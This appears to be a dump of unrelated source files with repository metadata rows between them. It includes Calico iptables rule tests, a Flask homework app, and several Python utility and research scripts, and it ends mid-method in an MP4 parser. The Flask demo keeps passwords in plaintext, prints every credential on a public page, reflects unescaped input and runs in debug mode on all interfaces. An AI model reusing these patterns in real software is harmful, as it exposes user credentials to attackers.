"1234::beef --match icmp6 --icmpv6-type 7 --jump RETURN",
DEFAULT_UNMARK % "felix-p-prof1-i",
],
'felix-p-prof1-o':
[
DEFAULT_MARK % "felix-p-prof1-o",
"--append felix-p-prof1-o --protocol icmpv6 --source "
"1234::beef --match icmp6 --icmpv6-type 7 --jump DROP",
DEFAULT_UNMARK % "felix-p-prof1-o",
]
},
},
]
FROM_ENDPOINT_CHAIN = [
# Always start with a 0 MARK.
'--append felix-from-abcd --jump MARK --set-mark 0/0x1000000',
# From chain polices the MAC address.
'--append felix-from-abcd --match mac ! --mac-source aa:22:33:44:55:66 '
'--jump DROP -m comment --comment '
'"Incorrect source MAC"',
# Now the tiered policies. For each tier we reset the "next tier" mark.
'--append felix-from-abcd --jump MARK --set-mark 0/0x2000000 '
'--match comment --comment "Start of tier tier_1"',
# Then, for each policies, we jump to the policies, and check if it set the
# accept mark, which immediately accepts.
'--append felix-from-abcd '
'--match mark --mark 0/0x2000000 --jump felix-p-t1p1-o',
'--append felix-from-abcd '
'--match mark --mark 0x1000000/0x1000000 '
'--match comment --comment "Return if policy accepted" '
'--jump RETURN',
'--append felix-from-abcd '
'--match mark --mark 0/0x2000000 --jump felix-p-t1p2-o',
'--append felix-from-abcd '
'--match mark --mark 0x1000000/0x1000000 '
'--match comment --comment "Return if policy accepted" '
'--jump RETURN',
# Then, at the end of the tier, drop if nothing in the tier did a
# "next-tier"
'--append felix-from-abcd '
'--match mark --mark 0/0x2000000 '
'--match comment --comment "Drop if no policy in tier passed" '
'--jump DROP',
# Now the second tier...
'--append felix-from-abcd '
'--jump MARK --set-mark 0/0x2000000 --match comment '
'--comment "Start of tier tier_2"',
'--append felix-from-abcd '
'--match mark --mark 0/0x2000000 --jump felix-p-t2p1-o',
'--append felix-from-abcd '
'--match mark --mark 0x1000000/0x1000000 --match comment '
'--comment "Return if policy accepted" --jump RETURN',
'--append felix-from-abcd '
'--match mark --mark 0/0x2000000 --match comment '
'--comment "Drop if no policy in tier passed" --jump DROP',
# Jump to the first profile.
'--append felix-from-abcd --jump felix-p-prof-1-o',
# Short-circuit: return if the first profile matched.
'--append felix-from-abcd --match mark --mark 0x1000000/0x1000000 '
'--match comment --comment "Profile accepted packet" '
'--jump RETURN',
# Jump to second profile.
'--append felix-from-abcd --jump felix-p-prof-2-o',
# Return if the second profile matched.
'--append felix-from-abcd --match mark --mark 0x1000000/0x1000000 '
'--match comment --comment "Profile accepted packet" '
'--jump RETURN',
# Drop the packet if nothing matched.
'--append felix-from-abcd --jump DROP -m comment --comment '
'"Packet did not match any profile (endpoint e1)"'
]
TO_ENDPOINT_CHAIN = [
# Always start with a 0 MARK.
'--append felix-to-abcd --jump MARK --set-mark 0/0x1000000',
# Then do the tiered policies in order. Tier 1:
'--append felix-to-abcd --jump MARK --set-mark 0/0x2000000 '
'--match comment --comment "Start of tier tier_1"',
'--append felix-to-abcd --match mark --mark 0/0x2000000 '
'--jump felix-p-t1p1-i',
'--append felix-to-abcd --match mark --mark 0x1000000/0x1000000 '
'--match comment --comment "Return if policy accepted" --jump RETURN',
'--append felix-to-abcd --match mark --mark 0/0x2000000 '
'--jump felix-p-t1p2-i',
'--append felix-to-abcd --match mark --mark 0x1000000/0x1000000 '
'--match comment --comment "Return if policy accepted" --jump RETURN',
'--append felix-to-abcd --match mark --mark 0/0x2000000 '
'--match comment --comment "Drop if no policy in tier passed" '
'--jump DROP',
# Tier 2:
'--append felix-to-abcd --jump MARK --set-mark 0/0x2000000 '
'--match comment --comment "Start of tier tier_2"',
'--append felix-to-abcd --match mark --mark 0/0x2000000 '
'--jump felix-p-t2p1-i',
'--append felix-to-abcd --match mark --mark 0x1000000/0x1000000 '
'--match comment --comment "Return if policy accepted" '
'--jump RETURN',
'--append felix-to-abcd --match mark --mark 0/0x2000000 '
'--match comment --comment "Drop if no policy in tier passed" '
'--jump DROP',
# Jump to first profile and return iff it matched.
'--append felix-to-abcd --jump felix-p-prof-1-i',
'--append felix-to-abcd --match mark --mark 0x1000000/0x1000000 '
'--match comment --comment "Profile accepted packet" '
'--jump RETURN',
# Jump to second profile and return iff it matched.
'--append felix-to-abcd --jump felix-p-prof-2-i',
'--append felix-to-abcd --match mark --mark 0x1000000/0x1000000 '
'--match comment --comment "Profile accepted packet" '
'--jump RETURN',
# Drop anything that doesn't match.
'--append felix-to-abcd --jump DROP -m comment --comment '
'"Packet did not match any profile (endpoint e1)"'
]
class TestGlobalChains(BaseTestCase):
def setUp(self):
super(TestGlobalChains, self).setUp()
host_dict = {
"MetadataAddr": "123.0.0.1",
"MetadataPort": "1234",
"DefaultEndpointToHostAction": "DROP"
}
self.config = load_config("felix_default.cfg", host_dict=host_dict)
self.iptables_generator = self.config.plugins["iptables_generator"]
self.m_iptables_updater = Mock(spec=IptablesUpdater)
def test_build_input_chain(self):
chain, deps = self.iptables_generator.filter_input_chain(ip_version=4)
self.assertEqual(chain, INPUT_CHAINS["Default"])
self.assertEqual(deps, set())
def test_build_input_chain_ipip(self):
chain, deps = self.iptables_generator.filter_input_chain(
ip_version=4,
hosts_set_name="felix-hosts")
self.assertEqual(chain, INPUT_CHAINS["IPIP"])
self.assertEqual(deps, set())
def test_build_input_chain_return(self):
host_dict = {
"MetadataAddr": "123.0.0.1",
"MetadataPort": "1234",
"DefaultEndpointToHostAction": "RETURN"
}
config = load_config("felix_default.cfg", host_dict=host_dict)
chain, deps = config.plugins["iptables_generator"].filter_input_chain(
ip_version=6)
self.assertEqual(chain, INPUT_CHAINS["Return"])
self.assertEqual(deps, set(["felix-FROM-ENDPOINT"]))
class TestRules(BaseTestCase):
def setUp(self):
super(TestRules, self).setUp()
host_dict = {
"MetadataAddr": "123.0.0.1",
"MetadataPort": "1234",
"DefaultEndpointToHostAction": "DROP"
}
self.config = load_config("felix_default.cfg", host_dict=host_dict)
self.iptables_generator = self.config.plugins["iptables_generator"]
self.m_iptables_updater = Mock(spec=IptablesUpdater)
def test_profile_chain_names(self):
chain_names = self.iptables_generator.profile_chain_names("prof1")
self.assertEqual(chain_names, set(["felix-p-prof1-i", "felix-p-prof1-o"]))
def test_tiered_policy_chain_names(self):
chain_names = self.iptables_generator.profile_chain_names(
TieredPolicyId("tier", "pol")
)
self.assertEqual(chain_names,
set(['felix-p-tier/pol-o',
'felix-p-tier/pol-i']))
def test_split_port_lists(self):
self.assertEqual(
self.iptables_generator._split_port_lists([1, 2, 3, 4, 5, 6, 7, 8, 9,
10, 11, 12, 13, 14, 15]),
[['1', '2', '3', '4', '5', '6', '7', '8', '9',
'10', '11', '12', '13', '14', '15']]
)
self.assertEqual(
self.iptables_generator._split_port_lists([1, 2, 3, 4, 5, 6, 7, 8, 9,
10, 11, 12, 13, 14, 15, 16]),
[['1', '2', '3', '4', '5', '6', '7', '8', '9',
'10', '11', '12', '13', '14', '15'],
['16']]
)
self.assertEqual(
self.iptables_generator._split_port_lists([1, "2:3", 4, 5, 6, 7, 8, 9,
10, 11, 12, 13, 14, 15, 16, 17]),
[['1', '2:3', '4', '5', '6', '7', '8', '9',
'10', '11', '12', '13', '14', '15'],
['16', '17']]
)
def test_rules_generation(self):
for test in RULES_TESTS:
updates, deps = self.iptables_generator.profile_updates(
test["profile"]["id"],
test["profile"],
test["ip_version"],
test["tag_to_ipset"],
selector_to_ipset=test.get("sel_to_ipset", {}),
on_allow=test.get("on_allow", "RETURN"),
on_deny=test.get("on_deny", "DROP")
)
self.assertEqual((updates, deps), (test["updates"], {}))
def test_unknown_action(self):
updates, deps = self.iptables_generator.profile_updates(
"prof1",
{
"inbound_rules": [{"action": "unknown"}],
"outbound_rules": [{"action": "unknown"}],
},
4,
{},
selector_to_ipset={},
)
self.maxDiff = None
# Should get back a drop rule.
drop_rules_i = self.iptables_generator.drop_rules(
4,
"felix-p-prof1-i",
None,
"ERROR failed to parse rules",
)
drop_rules_o = self.iptables_generator.drop_rules(
4,
"felix-p-prof1-o",
None,
"ERROR failed to parse rules",
)
self.assertEqual(
updates,
{
'felix-p-prof1-i':
['--append felix-p-prof1-i --jump MARK '
'--set-mark 0x1000000/0x1000000'] +
drop_rules_i +
['--append felix-p-prof1-i --match comment '
'--comment "No match, fall through to next profile" '
'--jump MARK --set-mark 0/0x1000000'],
'felix-p-prof1-o':
['--append felix-p-prof1-o --jump MARK '
'--set-mark 0x1000000/0x1000000'] +
drop_rules_o +
['--append felix-p-prof1-o --match comment '
'--comment "No match, fall through to next profile" '
'--jump MARK --set-mark 0/0x1000000']
}
)
def test_bad_icmp_type(self):
with self.assertRaises(UnsupportedICMPType):
self.iptables_generator._rule_to_iptables_fragments_inner(
"foo", {"icmp_type": 255}, 4, {}, {}
)
def test_bad_protocol_with_ports(self):
with self.assertRaises(AssertionError):
self.iptables_generator._rule_to_iptables_fragments_inner(
"foo", {"protocol": "10", "src_ports": [1]}, 4, {}, {}
)
class TestEndpoint(BaseTestCase):
def setUp(self):
super(TestEndpoint, self).setUp()
self.config = load_config("felix_default.cfg")
self.iptables_generator = self.config.plugins["iptables_generator"]
self.m_iptables_updater = Mock(spec=IptablesUpdater)
def test_endpoint_chain_names(self):
self.assertEqual(
self.iptables_generator.endpoint_chain_names("abcd"),
set(["felix-to-abcd", "felix-from-abcd"]))
def test_get_endpoint_rules(self):
expected_result = (
{
'felix-from-abcd': FROM_ENDPOINT_CHAIN,
'felix-to-abcd': TO_ENDPOINT_CHAIN
},
{
# From chain depends on the outbound profiles.
'felix-from-abcd': set(['felix-p-prof-1-o',
'felix-p-prof-2-o',
'felix-p-t1p1-o',
'felix-p-t1p2-o',
'felix-p-t2p1-o',]),
# To chain depends on the inbound profiles.
'felix-to-abcd': set(['felix-p-prof-1-i',
'felix-p-prof-2-i',
'felix-p-t1p1-i',
'felix-p-t1p2-i',
'felix-p-t2p1-i',])
}
)
tiered_policies = OrderedDict()
tiered_policies["tier_1"] = ["t1p1", "t1p2"]
tiered_policies["tier_2"] = ["t2p1"]
result = self.iptables_generator.endpoint_updates(4, "e1", "abcd",
"aa:22:33:44:55:66",
["prof-1", "prof-2"],
tiered_policies)
# Log the whole diff if the comparison fails.
self.maxDiff = None
self.assertEqual(result, expected_result)
| apache-2.0 | -435,367,150,946,990,660 | 39.4 | 110 | 0.507983 | false |
seerjk/reboot06 | 06/homework/demo1.py | 1 | 2785 | # coding:utf-8
from flask import Flask, request, render_template
app = Flask(__name__)
@app.route('/login')
def index():
# return "<h1>hello world</h1>"
# return '<input type="button" value="click me">'
# default dir: ./templates
return render_template("login.html")
@app.route('/reboot')
def reboot():
return "<h1>hello, reboot</h1>"
@app.route('/test1')
def test1():
age = request.args.get('age')
print age
return "<h2>ages: %s</h2>" % age
@app.route('/test_form')
def test_form():
name = request.args.get('name')
passwd = request.args.get('passwd')
res = ""
if name == "jiangk":
if passwd == "12345":
res = "Welcome %s" % name
else:
            res = "password wrong."
else:
res = "%s doesn't exist." % name
return res
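# Example (illustrative): GET /test_form?name=jiangk&passwd=12345 returns
# "Welcome jiangk"; a wrong password returns "password wrong." and an unknown
# name returns "<name> doesn't exist."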
#
try:
with open('user.txt') as f:
lines = f.readlines()
except Exception, e:
print "Error"
exit(-1)
user_dict = {}
for line in lines:
line = line.strip().split(' ')
user_dict[line[0]] = line[1]
@app.route('/test_user_file')
def test_user_file():
global user_dict
name = request.args.get('name')
passwd = request.args.get('passwd')
res = ""
if name in user_dict:
if passwd == user_dict[name]:
res = "Welcome %s" % name
else:
            res = "password wrong."
else:
res = "%s doesn't exist." % name
return res
@app.route('/table1')
def table1():
return render_template("table1.html")
@app.route('/print_table')
def print_table():
res = '''
<table border="1">
<thead>
<tr>
<th>name</th>
<th>passwd</th>
</tr>
</thead>
<tbody>
'''
for name, pwd in user_dict.items():
res += '''
<tr>
<td>%s</td>
<td>%s</td>
</tr>
''' % (name, pwd)
res += '''
</tbody>
</table>
'''
return res
@app.route('/user_table')
def user_table():
res = '''
<table border="1">
<thead>
<tr>
<th>姓名</th>
<th>密码</th>
<th>操作</th>
</tr>
</thead>
<tbody>
'''
for name, pwd in user_dict.items():
res += '''
<tr>
<td>%s</td>
<td>%s</td>
</tr>
''' % (name, pwd)
res += '''
</tbody>
</table>
'''
return res
@app.route('/test_args')
def test_args():
name = request.args.get('name')
print "len: %d, name: (%s), type: %s" %( len(name), name, type(name))
return "len: %d, name: (%s), type: %s" %( len(name), name, type(name))
if __name__ == "__main__":
app.run(host="0.0.0.0", port=9002, debug=True)
| mit | 8,115,482,448,132,503,000 | 19.094203 | 74 | 0.475298 | false |
yochow/autotest | utils/coverage_suite.py | 1 | 1761 | #!/usr/bin/python
import os, sys
import unittest_suite
import common
from autotest_lib.client.common_lib import utils
root = os.path.abspath(os.path.join(os.path.dirname(__file__), '..'))
def is_valid_directory(dirpath):
if dirpath.find('client/tests') >= 0:
return False
elif dirpath.find('client/site_tests') >= 0:
return False
elif dirpath.find('tko/migrations') >= 0:
return False
elif dirpath.find('server/tests') >= 0:
return False
elif dirpath.find('server/site_tests') >= 0:
return False
else:
return True
def is_valid_filename(f):
# has to be a .py file
if not f.endswith('.py'):
return False
    # but there are exceptions
if f.endswith('_unittest.py'):
return False
elif f == '__init__.py':
return False
elif f == 'common.py':
return False
else:
return True
def main():
coverage = os.path.join(root, "contrib/coverage.py")
unittest_suite = os.path.join(root, "unittest_suite.py")
    # remove preceding coverage data
cmd = "%s -e" % (coverage)
utils.system_output(cmd)
# run unittest_suite through coverage analysis
cmd = "%s -x %s" % (coverage, unittest_suite)
utils.system_output(cmd)
    # now walk through the directory grabbing lists of files
module_strings = []
for dirpath, dirnames, files in os.walk(root):
if is_valid_directory(dirpath):
for f in files:
if is_valid_filename(f):
temp = os.path.join(dirpath, f)
module_strings.append(temp)
# analyze files
cmd = "%s -r -m %s" % (coverage, " ".join(module_strings))
utils.system(cmd)
if __name__ == "__main__":
main()
| gpl-2.0 | 2,078,749,227,466,979,800 | 24.521739 | 69 | 0.593981 | false |
davek44/Basset | src/dev/basset_conv2_infl.py | 1 | 5417 | #!/usr/bin/env python
from optparse import OptionParser
import os
import random
import subprocess
import h5py
import matplotlib.pyplot as plt
import numpy as np
import seaborn as sns
################################################################################
# basset_conv2_infl.py
#
# Visualize the 2nd convolution layer of a CNN.
################################################################################
################################################################################
# main
################################################################################
def main():
usage = 'usage: %prog [options] <model_file> <test_hdf5_file>'
parser = OptionParser(usage)
parser.add_option('-d', dest='model_hdf5_file', default=None, help='Pre-computed model output as HDF5.')
parser.add_option('-o', dest='out_dir', default='.')
parser.add_option('-s', dest='sample', default=None, type='int', help='Sample sequences from the test set [Default:%default]')
(options,args) = parser.parse_args()
if len(args) != 2:
parser.error('Must provide Basset model file and test data in HDF5 format.')
else:
model_file = args[0]
test_hdf5_file = args[1]
if not os.path.isdir(options.out_dir):
os.mkdir(options.out_dir)
#################################################################
# load data
#################################################################
# load sequences
test_hdf5_in = h5py.File(test_hdf5_file, 'r')
seq_vecs = np.array(test_hdf5_in['test_in'])
seq_targets = np.array(test_hdf5_in['test_out'])
target_labels = list(test_hdf5_in['target_labels'])
test_hdf5_in.close()
#################################################################
# sample
#################################################################
if options.sample is not None:
# choose sampled indexes
sample_i = np.array(random.sample(xrange(seq_vecs.shape[0]), options.sample))
# filter
seq_vecs = seq_vecs[sample_i]
seq_targets = seq_targets[sample_i]
# create a new HDF5 file
sample_hdf5_file = '%s/sample.h5' % options.out_dir
sample_hdf5_out = h5py.File(sample_hdf5_file, 'w')
sample_hdf5_out.create_dataset('test_in', data=seq_vecs)
sample_hdf5_out.create_dataset('test_out', data=seq_targets)
sample_hdf5_out.close()
# update test HDF5
test_hdf5_file = sample_hdf5_file
#################################################################
# Torch predict
#################################################################
if options.model_hdf5_file is None:
options.model_hdf5_file = '%s/model_out.h5' % options.out_dir
# TEMP
torch_cmd = './basset_convs_infl.lua -layer 2 %s %s %s' % (model_file, test_hdf5_file, options.model_hdf5_file)
print torch_cmd
subprocess.call(torch_cmd, shell=True)
# load model output
model_hdf5_in = h5py.File(options.model_hdf5_file, 'r')
filter_means = np.array(model_hdf5_in['filter_means'])
filter_stds = np.array(model_hdf5_in['filter_stds'])
filter_infl = np.array(model_hdf5_in['filter_infl'])
filter_infl_targets = np.array(model_hdf5_in['filter_infl_targets'])
model_hdf5_in.close()
# store useful variables
num_filters = filter_means.shape[0]
num_targets = filter_infl_targets.shape[1]
#############################################################
# print filter influence table
#############################################################
# loss change table
table_out = open('%s/table_loss.txt' % options.out_dir, 'w')
for fi in range(num_filters):
cols = (fi, filter_infl[fi], filter_means[fi], filter_stds[fi])
print >> table_out, '%3d %7.4f %6.4f %6.3f' % cols
table_out.close()
# target change table
table_out = open('%s/table_target.txt' % options.out_dir, 'w')
for fi in range(num_filters):
for ti in range(num_targets):
cols = (fi, ti, target_labels[ti], filter_infl_targets[fi,ti])
print >> table_out, '%-3d %3d %20s %7.4f' % cols
table_out.close()
def plot_filter_heat(weight_matrix, out_pdf):
''' Plot a heatmap of the filter's parameters.
Args
weight_matrix: np.array of the filter's parameter matrix
out_pdf
'''
weight_range = abs(weight_matrix).max()
sns.set(font_scale=0.8)
plt.figure(figsize=(2,12))
sns.heatmap(weight_matrix, cmap='PRGn', linewidths=0.05, vmin=-weight_range, vmax=weight_range, yticklabels=False)
ax = plt.gca()
ax.set_xticklabels(range(1,weight_matrix.shape[1]+1))
plt.tight_layout()
plt.savefig(out_pdf)
plt.close()
def plot_output_density(f_outputs, out_pdf):
''' Plot the output density and compute stats.
Args
f_outputs: np.array of the filter's outputs
out_pdf
'''
sns.set(font_scale=1.3)
plt.figure()
sns.distplot(f_outputs, kde=False)
plt.xlabel('ReLU output')
plt.savefig(out_pdf)
plt.close()
return f_outputs.mean(), f_outputs.std()
################################################################################
# __main__
################################################################################
if __name__ == '__main__':
main()
#pdb.runcall(main)
| mit | -1,388,347,831,177,522,000 | 34.405229 | 130 | 0.510061 | false |
KingSpork/sporklib | algorithms/search_and_sort_algorithms.py | 1 | 2377 | import random
'''Binary Search'''
def binarySearch(someList, target):
lo = 0
hi = len(someList)
while lo+1 < hi:
test = (lo + hi) / 2
if someList[test] > target:
hi = test
else:
lo = test
if someList[lo] == target:
return lo
else:
return -1
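# Example (illustrative): binarySearch([1, 3, 5, 7, 9], 7) returns index 3,
# while a missing target such as binarySearch([1, 3, 5, 7, 9], 4) returns -1.
# The input list must already be sorted in ascending order.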
'''Find duplicates in array/list'''
def findDupes(someList):
dupes = []
hashTable = {}
uniques = set(someList)
if len(uniques) != len(someList):
for item in someList:
if hashTable.has_key(item) == True:
dupes.append(item)
else:
hashTable[item] = 0
return dupes
'''QuickSort, f yeah'''
def quickSort(someList):
listSize = len(someList) #get the length of the list
if len(someList) == 0: #if the list is empty...
return [] #...return an empty list
#ok, it gets real
less = [] #make an empty list for less
greater = [] #make an empty liss for greater
pivot = someList.pop(random.randint(0, listSize-1))
for element in someList:
if element <= pivot:
less.append(element)
else:
greater.append(element)
retList = quickSort(less) + [pivot] + quickSort(greater)
#print("Return list:");print(retList)
return retList
''' Heap Sort '''
def swap(someList, i, j):
someList[i], someList[j] = someList[j], someList[i]
def heapify(someList):
length = len(someList)
start = (length - 1) / 2
while start >= 0:
siftDown(someList, start, length-1)
start = start - 1
def siftDown(someList, start, end):
root = start #integers for indexes, remember
while (root * 2 + 1) <= end: #while root has at least one child
child = root * 2 + 1
swapper = root
if someList[swapper] < someList[child]:
swapper = child
if child+1 <= end and someList[swapper] < someList[child+1]:
swapper = child + 1
if swapper != root:
print("root: " + str(root) + " swapper: " + str(swapper))
try:
print("values: " + str(someList[root]) + " , " + str(someList[swapper]))
except:
print("Root or swapper out of range")
swap(someList, root, swapper)
root = swapper
else:
return
def heapSort(someList):
end = len(someList) -1
heapify(someList)
while end > 0:
swap(someList, end, 0)
end = end - 1
siftDown(someList, 0, end)
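# Minimal usage sketch for the routines above (the sample data is arbitrary).
# Note that heapSort() sorts in place and emits its debug prints while running.
if __name__ == '__main__':
    data = [9, 4, 7, 1, 8, 2]
    print(quickSort(list(data)))            # returns a new sorted list
    in_place = list(data)
    heapSort(in_place)                      # sorts the list in place
    print(in_place)
    print(binarySearch(sorted(data), 7))    # -> index of 7, or -1 if absent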
def isEqual(int1, int2, int3):
if int1 == int2 == int3:
return True
else:
return False | unlicense | 1,480,981,274,070,060,800 | 21.554455 | 76 | 0.611695 | false |
obnam-mirror/obnam | obnamlib/fmt_ga/leaf_store.py | 1 | 2653 | # Copyright 2016-2017 Lars Wirzenius
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# =*= License: GPL-3+ =*=
import tracing
import obnamlib
class LeafStoreInterface(object): # pragma: no cover
def put_leaf(self, leaf):
raise NotImplementedError()
def get_leaf(self, leaf_id):
raise NotImplementedError()
def remove_leaf(self, leaf_id):
raise NotImplementedError()
def flush(self):
raise NotImplementedError()
class InMemoryLeafStore(LeafStoreInterface):
def __init__(self):
self._leaves = {}
self._counter = 0
def put_leaf(self, leaf):
self._counter += 1
self._leaves[self._counter] = leaf
return self._counter
def get_leaf(self, leaf_id):
return self._leaves.get(leaf_id, None)
def remove_leaf(self, leaf_id):
if leaf_id in self._leaves:
del self._leaves[leaf_id]
def flush(self):
pass
class LeafStore(LeafStoreInterface): # pragma: no cover
def __init__(self):
self._blob_store = None
def set_blob_store(self, blob_store):
self._blob_store = blob_store
def put_leaf(self, leaf):
leaf_id = self._blob_store.put_blob(leaf.as_dict())
tracing.trace('new leaf %s', leaf_id)
return leaf_id
def get_leaf(self, leaf_id):
tracing.trace('leaf_id %s', leaf_id)
blob = self._blob_store.get_blob(leaf_id)
if blob is None:
tracing.trace('no blob for leaf %r', leaf_id)
return None
tracing.trace('got blob for leaf %r', leaf_id)
leaf = obnamlib.CowLeaf()
leaf.from_dict(self._blob_store.get_blob(leaf_id))
return leaf
def remove_leaf(self, leaf_id):
tracing.trace('leaf_id %s', leaf_id)
# FIXME: This is a bit ugly, since we need to break the
# bag/blob store abstraction.
bag_id, _ = obnamlib.parse_object_id(leaf_id)
self._blob_store._bag_store.remove_bag(bag_id)
def flush(self):
self._blob_store.flush()
| gpl-3.0 | 48,278,622,617,393,850 | 26.635417 | 71 | 0.636638 | false |
fabaff/fsl | fsl-maintenance.py | 1 | 7450 | #!/usr/bin/env python3
#
# fsl-maintenance - A helper script to maintain the Security Lab package list
# and other relevant maintenance tasks.
#
# Copyright (c) 2012-2019 Fabian Affolter <[email protected]>
#
# All rights reserved.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc.,
# 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
#
# Credit goes to Robert Scheck. He did a lot of the brain work for the initial
# approach. This script is heavily based on his Perl scripts.
import argparse
import operator
import itertools
import datetime
import re
import sys
import os
try:
import columnize
except ImportError:
print("Please install pycolumnize first -> sudo dnf -y install python3-columnize")
import dnf
try:
import git
except ImportError:
print("Please install GitPython first -> sudo dnf -y install python3-GitPython")
try:
import yaml
except ImportError:
print("Please install PyYAML first -> sudo dnf -y install PyYAML")
try:
import click
except ImportError:
print("Please install click first -> sudo dnf -y install python3-click")
DEFAULT_FILENAME = 'pkglist.yaml'
repo = git.Repo(os.getcwd())
def getPackages():
"""Read YAML package file and return all packages."""
file = open(DEFAULT_FILENAME, 'r')
pkgslist = yaml.safe_load(file)
file.close()
return pkgslist
@click.group()
@click.version_option()
def cli():
"""fsl-maintenance
This tool can be used for maintaining the Fedora Security Lab package list.
"""
@cli.group()
def display():
"""Display the details about the packages."""
@display.command('full')
def full():
"""All included tools and details will be printed to STDOUT."""
pkgslist = getPackages()
pkgslistIn = []
pkgslistEx = []
pkgslistAll = []
# All packages
pkgslistAll = []
for pkg in pkgslist:
pkgslistAll.append(pkg['pkg'])
# Split list of packages into included and excluded packages
# Not used at the moment
#for pkg in pkgslist:
# if 'exclude' in pkg:
# pkgslistEx.append(pkg['pkg'])
# else:
# pkgslistIn.append(pkg['pkg'])
# Displays the details to STDOUT
print("\nDetails about the packages in the Fedora Security Lab.\n")
print("Packages in comps : ", len(pkgslist))
#print("Packages included in live media : ", len(pkgslistIn))
print("\nPackage listing:")
sorted_pkgslist = sorted(pkgslistAll)
print(columnize.columnize(sorted_pkgslist, displaywidth=72))
@display.command('raw')
def raw():
"""The pkglist.yaml file will be printed to STDOUT."""
pkgslist = getPackages()
print(yaml.dump(pkgslist))
@display.command('short')
def short():
"""Only show the absolute minimum about the package list."""
pkgslist = getPackages()
# Displays the details to STDOUT
print("\nDetails about the packages in the Fedora Security Lab\n")
print("Packages in comps : ", len(pkgslist))
print("\nTo see all available options use -h or --help.")
@cli.group()
def output():
"""Create various output from the package list."""
@output.command('comps')
def comps():
"""
Generates the entries to include into the comps-fXX.xml.in file.
<packagelist>
...
</packagelist>
"""
pkgslist = getPackages()
    # Split list of packages into included and excluded packages
sorted_pkgslist = sorted(pkgslist, key=operator.itemgetter('pkg'))
for pkg in sorted_pkgslist:
entry = ' <packagereq type="default">{}</packagereq>'.format(pkg['pkg'])
print(entry)
@output.command('playbook')
def playbook():
"""Generate an Ansible playbook for the installation."""
pkgslist = getPackages()
part1 = """# This playbook installs all Fedora Security Lab packages.
#
# Copyright (c) 2013-2018 Fabian Affolter <[email protected]>
#
# All rights reserved.
# This file is licensed under GPLv2, for more details check COPYING.
#
# Generated by fsl-maintenance.py at %s
#
# Usage: ansible-playbook fsl-packages.yml -f 10
---
- hosts: fsl_hosts
user: root
tasks:
- name: install all packages from the FSL
dnf: pkg={{ item }}
state=present
with_items:\n""" % (datetime.date.today())
# Split list of packages into included and excluded packages
sorted_pkgslist = sorted(pkgslist, key=operator.itemgetter('pkg'))
# Write the playbook files
fileOut = open('ansible-playbooks/fsl-packages.yml', 'w')
fileOut.write(part1)
for pkg in sorted_pkgslist:
fileOut.write(' - %s\n' % pkg['pkg'])
fileOut.close()
# Commit the changed file to the repository
repo.git.add('ansible-playbooks/fsl-packages.yml')
repo.git.commit(m='Update playbook')
repo.git.push()
@output.command('live')
def live():
"""Generate the exclude list for the kickstart file."""
pkgslist = getPackages()
# Split list of packages into included and excluded packages
sorted_pkgslist = sorted(pkgslist, key=operator.itemgetter('pkg'))
for pkg in sorted_pkgslist:
if pkg['exclude'] == 1:
print("- ", pkg['pkg'])
@output.command('menus')
def menus():
"""Generate the .desktop files which are used for the menu structure."""
pkgslist = getPackages()
# Terminal is the standard terminal application of the Xfce desktop
terminal = 'xfce4-terminal'
# Collects all files in the directory
filelist = []
os.chdir('security-menu')
for files in os.listdir("."):
if files.endswith(".desktop"):
filelist.append(files)
# Write the .desktop files
for pkg in pkgslist:
if 'command' and 'name' in pkg:
file_out = open('security-{}.desktop'.format(pkg['pkg']), 'w')
file_out.write('[Desktop Entry]\n')
file_out.write('Name={}\n'.format(pkg['name']))
file_out.write("Exec={} -e \"su -c '{}; bash'\"\n".format(
terminal, pkg['command']))
file_out.write('TryExec={}\n'.format(pkg['pkg']))
file_out.write('Type=Application\n')
file_out.write('Categories=System;Security;X-SecurityLab;'
'X-{};\n'.format(pkg['category']))
file_out.close()
# Compare the needed .desktop file against the included packages, remove
# .desktop files from exclude packages
dellist = filelist
for pkg in pkgslist:
if 'command' in pkg:
dellist.remove('security-{}.desktop'.format(pkg['pkg']))
if 'exclude' in pkg:
if pkg['exclude'] == 1:
dellist.append('security-{}.desktop'.format(pkg['pkg']))
# Remove the .desktop files which are no longer needed
if len(dellist) != 0:
for file in dellist:
os.remove(file)
if __name__ == '__main__':
cli()
| gpl-2.0 | -920,566,221,492,696,600 | 29.658436 | 86 | 0.654497 | false |
hyt-hz/mediautils | mediautils/mp4/parser.py | 1 | 9133 | import struct
import traceback
import logging
class FileCache(object):
def __init__(self, file_obj, cache_size=0x0FFF):
self._file = file_obj
self._cache = None
self._cache_read_size = cache_size
self._cache_offset = 0
self.offset = 0
def read_from(self, start_offset, size, move=True):
if self._cache is None \
or start_offset >= self._cache_offset + self._cache_size \
or start_offset < self._cache_offset:
self._read2cache(start_offset)
if self._cache_size == 0:
return ''
if start_offset + size <= self._cache_offset + self._cache_size:
if move:
self.offset = start_offset + size
return self._cache[(start_offset-self._cache_offset):(start_offset+size-self._cache_offset)]
else:
data = self._cache[(start_offset-self._cache_offset):]
self._read2cache()
if self._cache_size == 0:
return ''
while True:
if start_offset + size <= self._cache_offset + self._cache_size:
if move:
self.offset = start_offset + size
return data + self._cache[(start_offset-self._cache_offset):(start_offset+size-self._cache_offset)]
else:
data += self._cache[(start_offset-self._cache_offset):]
self._read2cache()
if self._cache_size == 0:
return data
def read(self, size):
return self.read_from(self.offset, size)
def peek(self, size):
return self.read_from(self.offset, size, move=False)
def seek(self, offset):
self._file.seek(offset)
self.offset = offset
def tell(self):
return self.offset
def forward(self, size):
self.offset += size
def backward(self, size):
if self.offset <= size:
self.offset = 0
else:
self.offset -= size
def _read2cache(self, offset=None):
if offset is None:
# continue
self._cache_offset += self._cache_size
self._cache = self._file.read(self._cache_read_size)
else:
self._file.seek(offset)
